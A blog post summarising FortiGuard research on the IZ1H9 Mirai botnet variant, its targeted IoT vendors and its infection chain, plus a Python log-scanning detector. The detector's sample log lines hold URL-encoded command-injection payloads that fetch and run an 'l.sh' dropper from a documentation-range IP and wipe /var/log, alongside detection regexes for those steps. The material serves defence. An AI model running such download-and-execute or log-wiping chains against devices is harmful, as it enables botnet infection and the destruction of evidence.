A new variant of the Mirai botnet, known as IZ1H9, has recently updated its collection of exploit payloads. These exploits target vulnerabilities in various Linux-based routers, IP cameras, and other IoT devices, including brands like D-Link, TP-Link, Zyxel, Netis, Sunhillo SureLine, Geutebruck, Yealink Device Management, TP-Link Archer, Korenix JetWave, and TOTOLINK.

This significant evolution in the botnet was discovered during a new DDoS campaign, when FortiGuard Labs observed exploitation attempts peaking on September 6, with tens of thousands of triggers recorded.

Fortinet reports that the botnet now utilizes 13 new exploit payloads, ranging from flaws discovered in 2015 to those found in 2023. Among these, four flaws target D-Link devices, eight target Geutebruck products, one targets the Netis WF2419, one targets Korenix JetWave routers, and one targets the Sunhillo SureLine application. Additionally, there are 12 exploits targeting TOTOLINK routers.

The infection process begins with the exploitation of one of the vulnerabilities above to inject the IZ1H9 payload into the device. The payload contains a command that instructs the device to download a shell script downloader named “l.sh” from a specific URL. Once executed, the script deletes logs to hide any suspicious activity, retrieves bot clients built for different system architectures, and establishes communication with a C2 server to initiate various types of DDoS attacks.
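The infection chain described above (a command-injection request that fetches a dropper such as “l.sh”, runs it, wipes logs, and pulls architecture-specific bot binaries) leaves recognisable traces in a device's HTTP access log. The following detector is an added example written for this post from a defender's point of view; it is not code from Fortinet or from the article, and the log lines, IP addresses (documentation ranges) and the `/cgi-bin/example.cgi` endpoint are constructed for illustration, not taken from any real device. It URL-decodes each request target and tags the Mirai-style indicators it finds.

```python
"""Flag Mirai-style download-and-execute command injection in HTTP access logs."""
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Constructed sample access-log lines (hypothetical; RFC 5737 documentation IPs,
# made-up endpoint). Line 2 carries a download-and-execute chain that fetches a
# dropper named "l.sh" and then wipes /var/log; line 3 fetches an
# architecture-specific bot binary; lines 1 and 4 are benign (line 4 contains
# "sh" in its path on purpose, to show the patterns do not over-match).
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [06/Sep/2023:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1452',
    '203.0.113.11 - - [06/Sep/2023:10:01:13 +0000] "POST /cgi-bin/example.cgi?cmd=cd+%2Ftmp%3B+wget+'
    'http%3A%2F%2F192.0.2.5%2Fl.sh%3B+chmod+777+l.sh%3B+sh+l.sh%3B+rm+-rf+%2Fvar%2Flog%2F* HTTP/1.1" 500 0',
    '203.0.113.12 - - [06/Sep/2023:10:01:14 +0000] "GET /cgi-bin/example.cgi?q=%2Fbin%2Fbusybox+wget+'
    'http%3A%2F%2F192.0.2.5%2Fbot.mips+-O+%2Ftmp%2Fx HTTP/1.1" 404 0',
    '203.0.113.13 - - [06/Sep/2023:10:01:15 +0000] "GET /help/sh.html HTTP/1.1" 200 300',
]

# Common-log-format request line: client IP, then "<METHOD> <target> HTTP/x.y".
REQUEST_LINE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

# Indicator patterns, evaluated against the URL-decoded request target.
# Order matters only for the order of tags in the result.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    # Any remote fetch tool invoked inside a request parameter.
    ("remote file fetch", re.compile(r"\b(?:wget|curl|tftp|ftpget)\s+", re.I)),
    # Fetch followed by execution or chmod: the classic dropper chain.
    ("download-and-execute chain",
     re.compile(r"\b(?:wget|curl|tftp|ftpget)\b.*?\b(?:sh|bash|chmod)\b", re.I)),
    # The dropper name reported for this campaign.
    ("known dropper name l.sh", re.compile(r"\bl\.sh\b", re.I)),
    # Bot binaries named after the CPU architecture they were built for.
    ("architecture-specific payload fetch",
     re.compile(r"\.(?:mips|mipsel|mpsl|arm[4-7]?|armv\dl|x86|x86_64|i686|sh4|ppc|m68k|spc)\b", re.I)),
    # Log wiping, as the script does to hide its activity.
    ("log wiping", re.compile(r"rm\s+-rf?\s+/var/log|>\s*/var/log/", re.I)),
]


def analyze_request(target: str) -> List[str]:
    """Return the list of indicator tags found in one request target (empty if benign)."""
    decoded = unquote_plus(target)  # %2F, %3B and '+' become '/', ';' and ' '
    return [tag for tag, pattern in INDICATORS if pattern.search(decoded)]


def scan_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (client, decoded_target, tags) for every request that carries an indicator."""
    hits = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        tags = analyze_request(match.group("target"))
        if tags:
            hits.append((match.group("client"), unquote_plus(match.group("target")), tags))
    return hits


if __name__ == "__main__":
    for client, target, tags in scan_log(SAMPLE_LOG_LINES):
        print(f"{client}: {', '.join(tags)}\n    {target}")
```

Access logs record only the request line, so injection carried in a POST body will not be visible here; for that, feed the same `analyze_request` function the decoded body captured by a reverse proxy or WAF. A hit on "log wiping" is worth treating as high priority, since the device's own logs may already be gone and the access log of an upstream proxy is then the only record.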

Ultimately, it is crucial to address these vulnerabilities promptly to minimize the risks associated with device exposure. As the Mirai botnet continues to expand its arsenal of exploit triggers, timely application of security patches becomes increasingly important.

Fabio

Full Stack Developer

About the Author

I’m passionate about web development and design in all its forms, helping small businesses build and improve their online presence. I spend a lot of time learning new techniques and actively helping other people learn web development through a variety of help groups and writing tutorials for my blog about advancements in web design and development.
